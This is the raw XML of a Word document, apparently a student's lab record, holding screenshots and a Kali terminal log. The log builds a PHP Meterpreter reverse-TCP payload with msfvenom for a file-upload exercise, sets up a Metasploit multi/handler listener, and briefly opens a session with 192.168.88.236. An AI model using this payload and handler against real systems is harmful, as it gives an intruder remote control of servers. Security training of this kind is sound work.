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0F4F5" w14:textId="61A04096" w:rsidR="00C50AFB" w:rsidRDefault="0010363A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B36F739" wp14:editId="3C53458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98D3" w14:textId="04B5DD7F" w:rsidR="0010363A" w:rsidRDefault="0010363A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="350B9E51" wp14:editId="638CA9D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B4BAC" wp14:editId="6054894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0E0E" w14:textId="0DA64949" w:rsidR="0010363A" w:rsidRDefault="0010363A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C0E713D" wp14:editId="683D2AF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3EBA" w14:textId="386A5D2B" w:rsidR="0010363A" w:rsidRDefault="0010363A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2BBA630F" wp14:editId="50967DF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38F" w14:textId="292FC12A" w:rsidR="0010363A" w:rsidRDefault="0010363A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7EB407CE" wp14:editId="6AD2847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2121" w14:textId="35088351" w:rsidR="0010363A" w:rsidRDefault="0010363A"/>
    <w:p w14:paraId="39551478" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301">
      <w:r>
        <w:t>fatima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0FFF0282" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301">
      <w:r>
        <w:t>└─$ sudo su</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450FFC09" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301">
      <w:r>
        <w:t xml:space="preserve">[sudo] password for fatima: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1144B1B3" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C730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1361DDFF" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301">
      <w:r>
        <w:t>└─# ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8E3B6E" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301">
      <w:r>
        <w:t>Desktop  Documents  Downloads  Music  Pictures  Public  Templates  Videos  shell_low.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678AC2DA" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301">
      <w:r>
        <w:t xml:space="preserve">                                                                                                                                                                      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51620182" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C730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37E0A9AD" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301">
      <w:r>
        <w:t xml:space="preserve">└─# rm shell_low.php    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DA1655" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301">
      <w:r>
        <w:t xml:space="preserve">                                                                                                                                                                      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09979579" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C730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174DE73A" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301">
      <w:r>
        <w:t>└─# ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22AC4C40" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301">
      <w:r>
        <w:t>Desktop  Documents  Downloads  Music  Pictures  Public  Templates  Videos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F60539" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301">
      <w:r>
        <w:t xml:space="preserve">                                                                                                                                                                      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67332A9B" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301">
      <w:r>
        <w:lastRenderedPageBreak/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30F6606A" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301">
      <w:r>
        <w:t>└─# ifconfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DD8FC2" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301">
      <w:r>
        <w:t>eth0: flags=4163&lt;UP,BROADCAST,RUNNING,MULTICAST&gt;  mtu 1500</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE0E9BB" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301">
      <w:r>
        <w:t xml:space="preserve">        inet 192.168.88.213  netmask 255.255.255.0  broadcast 192.168.88.255</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B738645" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301">
      <w:r>
        <w:t xml:space="preserve">        inet6 fe80::a00:27ff:fe6b:6c33  prefixlen 64  scopeid 0x20&lt;link&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F2EF04" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301">
      <w:r>
        <w:t xml:space="preserve">        ether 08:00:27:6b:6c:33  txqueuelen 1000  (Ethernet)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C84025" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301">
      <w:r>
        <w:t xml:space="preserve">        RX packets 2213  bytes 583510 (569.8 KiB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0851C787" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301">
      <w:r>
        <w:t xml:space="preserve">        RX errors 27  dropped 0  overruns 0  frame 27</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446031BA" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301">
      <w:r>
        <w:t xml:space="preserve">        TX packets 469  bytes 76093 (74.3 KiB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39608270" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301">
      <w:r>
        <w:t xml:space="preserve">        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4678E2AC" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301"/>
    <w:p w14:paraId="269CAE1D" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301">
      <w:r>
        <w:t>lo: flags=73&lt;UP,LOOPBACK,RUNNING&gt;  mtu 65536</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D048E7" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301">
      <w:r>
        <w:t xml:space="preserve">        inet 127.0.0.1  netmask 255.0.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4889B2DD" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301">
      <w:r>
        <w:t xml:space="preserve">        inet6 ::1  prefixlen 128  scopeid 0x10&lt;host&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659FA62B" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301">
      <w:r>
        <w:t xml:space="preserve">        loop  txqueuelen 1000  (Local Loopback)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B6B050" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301">
      <w:r>
        <w:t xml:space="preserve">        RX packets 8  bytes 480 (480.0 B)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5396CE18" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301">
      <w:r>
        <w:t xml:space="preserve">        RX errors 0  dropped 0  overruns 0  frame 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6D512C" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301">
      <w:r>
        <w:t xml:space="preserve">        TX packets 8  bytes 480 (480.0 B)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCFF8C1" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301">
      <w:r>
        <w:t xml:space="preserve">        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4486A994" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301"/>
    <w:p w14:paraId="7D2465B5" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301">
      <w:r>
        <w:t xml:space="preserve">                                                                                                                                                                      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785ED3E0" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C730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68F333C8" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301">
      <w:r>
        <w:t>└─# msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.88.213 LPORT=2222 -f raw -o fileuploadpayload_low.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55165FCA" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301">
      <w:r>
        <w:t>[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5665A3F2" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301">
      <w:r>
        <w:t>[-] No arch selected, selecting arch: php from the payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144F5368" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301">
      <w:r>
        <w:t>No encoder specified, outputting raw payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423F841D" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301">
      <w:r>
        <w:t>Payload size: 1115 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BC2361" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301">
      <w:r>
        <w:t>Saved as: fileuploadpayload_low.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A607B8" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                                                                                                                                                      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3983029F" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C730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kali)-[/home/fatima]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7208735D" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301">
      <w:r>
        <w:t xml:space="preserve">└─# msfconsole                                                                                                 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493E9C50" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301">
      <w:r>
        <w:t xml:space="preserve">Metasploit tip: Export your database results with db_export -f xml </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FF87B3" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301">
      <w:r>
        <w:t>&lt;file&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4305A150" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301">
      <w:r>
        <w:t xml:space="preserve">                                                  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0A5840" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301"/>
    <w:p w14:paraId="09E86618" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301">
      <w:r>
        <w:t xml:space="preserve">                                   .,,.                  .                                                                                                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A16E34" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301">
      <w:r>
        <w:t xml:space="preserve">                                .\$$$$$L..,,==aaccaacc%#s$b.       d8,    d8P                                                                                         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530D7F4E" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301">
      <w:r>
        <w:t xml:space="preserve">                     d8P        #$$$$$$$$$$$$$$$$$$$$$$$$$$$b.    `BP  d888888p                                                                                       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D9B8F0" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301">
      <w:r>
        <w:t xml:space="preserve">                  d888888P      '7$$$$\""""''^^`` .7$$$|D*"'```         ?88'                                                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0698B4B8" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301">
      <w:r>
        <w:t xml:space="preserve">  d8bd8b.d8p d8888b ?88' d888b8b            _.os#$|8*"`   d8P       ?8b  88P                                                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B59AF0B" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301">
      <w:r>
        <w:t xml:space="preserve">  88P`?P'?P d8b_,dP 88P d8P' ?88       .oaS###S*"`       d8P d8888b $whi?88b 88b                                                                                      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9CF551" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301">
      <w:r>
        <w:t xml:space="preserve"> d88  d8 ?8 88b     88b 88b  ,88b .osS$$$$*" ?88,.d88b, d88 d8P' ?88 88P `?8b                                                                                         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627BE05E" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301">
      <w:r>
        <w:t xml:space="preserve">d88' d88b 8b`?8888P'`?8b`?88P'.aS$$$$Q*"`    `?88'  ?88 ?88 88b  d88 d88                                                                                              </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455B5BFA" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301">
      <w:r>
        <w:t xml:space="preserve">                          .a#$$$$$$"`          88b  d8P  88b`?8888P'                                                                                                  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE459E3" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301">
      <w:r>
        <w:t xml:space="preserve">                       ,s$$$$$$$"`             888888P'   88n      _.,,,ass;:                                                                                         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F595206" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301">
      <w:r>
        <w:t xml:space="preserve">                    .a$$$$$$$P`               d88P'    .,.ass%#S$$$$$$$$$$$$$$'                                                                                       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60AC93FC" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301">
      <w:r>
        <w:t xml:space="preserve">                 .a$###$$$P`           _.,,-aqsc#SS$$$$$$$$$$$$$$$$$$$$$$$$$$'                                                                                        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B60249" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301">
      <w:r>
        <w:t xml:space="preserve">              ,a$$###$$P`  _.,-ass#S$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$####SSSS'                                                                                         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C829F41" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301">
      <w:r>
        <w:t xml:space="preserve">           .a$$$$$$$$$$SSS$$$$$$$$$$$$$$$$$$$$$$$$$$$$SS##==--""''^^/$$$$$$'                                                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2480AB" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301">
      <w:r>
        <w:t xml:space="preserve">_______________________________________________________________   ,&amp;$$$$$$'_____                                                                                      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2568E3EF" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301">
      <w:r>
        <w:t xml:space="preserve">                                                                 ll&amp;&amp;$$$$'                                                                                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FD0A10" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301">
      <w:r>
        <w:t xml:space="preserve">                                                              .;;lll&amp;&amp;&amp;&amp;'                                                                                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D77D12A" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301">
      <w:r>
        <w:t xml:space="preserve">                                                            ...;;lllll&amp;'                                                                                              </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A031CA" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301">
      <w:r>
        <w:t xml:space="preserve">                                                          ......;;;llll;;;....                                                                                        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A3040D" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301">
      <w:r>
        <w:t xml:space="preserve">                                                           ` ......;;;;... .  .                                                                                       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDF2F41" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301">
      <w:r>
        <w:t xml:space="preserve">                                                                                                                                                                      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2924A3DC" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301"/>
    <w:p w14:paraId="7DAF0131" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301">
      <w:r>
        <w:t xml:space="preserve">       =[ metasploit v6.4.99-dev                                ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCD9F93" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301">
      <w:r>
        <w:t>+ -- --=[ 2,572 exploits - 1,317 auxiliary - 1,683 payloads     ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146F9E1A" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301">
      <w:r>
        <w:t>+ -- --=[ 433 post - 49 encoders - 13 nops - 9 evasion          ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1910FACD" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301"/>
    <w:p w14:paraId="3B725C85" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301">
      <w:r>
        <w:t>Metasploit Documentation: https://docs.metasploit.com/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D543030" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301">
      <w:r>
        <w:t>The Metasploit Framework is a Rapid7 Open Source Project</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C95B0F" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301"/>
    <w:p w14:paraId="74B71C12" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301">
      <w:r>
        <w:t>msf &gt; use exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBCE5A3" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301">
      <w:r>
        <w:t>[*] Using configured payload generic/shell_reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC264DE" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301">
      <w:r>
        <w:t>msf exploit(multi/handler) &gt; set payload php/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A4A3DD" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301">
      <w:r>
        <w:t>payload =&gt; php/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2F4201" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301">
      <w:r>
        <w:t>msf exploit(multi/handler) &gt; set LHOST 192.168.88.213</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03040FB6" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301">
      <w:r>
        <w:t>LHOST =&gt; 192.168.88.213</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DDB6998" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301">
      <w:r>
        <w:t>msf exploit(multi/handler) &gt; set LPORT 2222</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756EDA10" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301">
      <w:r>
        <w:t>LPORT =&gt; 2222</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B09398" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301">
      <w:r>
        <w:t>msf exploit(multi/handler) &gt; exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691B0AC1" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301">
      <w:r>
        <w:t xml:space="preserve">[*] Started reverse TCP handler on 192.168.88.213:2222 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D787477" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301">
      <w:r>
        <w:t>[*] Sending stage (41224 bytes) to 192.168.88.236</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2118D7B8" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301">
      <w:r>
        <w:t>[*] Meterpreter session 1 opened (192.168.88.213:2222 -&gt; 192.168.88.236:40335) at 2026-05-14 00:48:35 -0400</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51186331" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301"/>
    <w:p w14:paraId="2FA2353B" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301">
      <w:r>
        <w:t xml:space="preserve">meterpreter &gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE0D785" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301" w:rsidP="009C7301">
      <w:r>
        <w:t>[*] 192.168.88.236 - Meterpreter session 1 closed.  Reason: Died</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A288E1" w14:textId="77777777" w:rsidR="009C7301" w:rsidRDefault="009C7301"/>
    <w:p w14:paraId="292ED533" w14:textId="77777777" w:rsidR="0010363A" w:rsidRDefault="0010363A"/>
    <w:sectPr w:rsidR="00103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0"/>
    <w:rsid w:val="000F5720"/>
    <w:rsid w:val="0010363A"/>
    <w:rsid w:val="009C7301"/>
    <w:rsid w:val="00C5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05A8"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{6D130DFB-2C54-4BA2-A950-AABF84A7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2026-05-14T04:49:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-14T04:59:00Z</dcterms:modified>
</cp:coreProperties>
</file>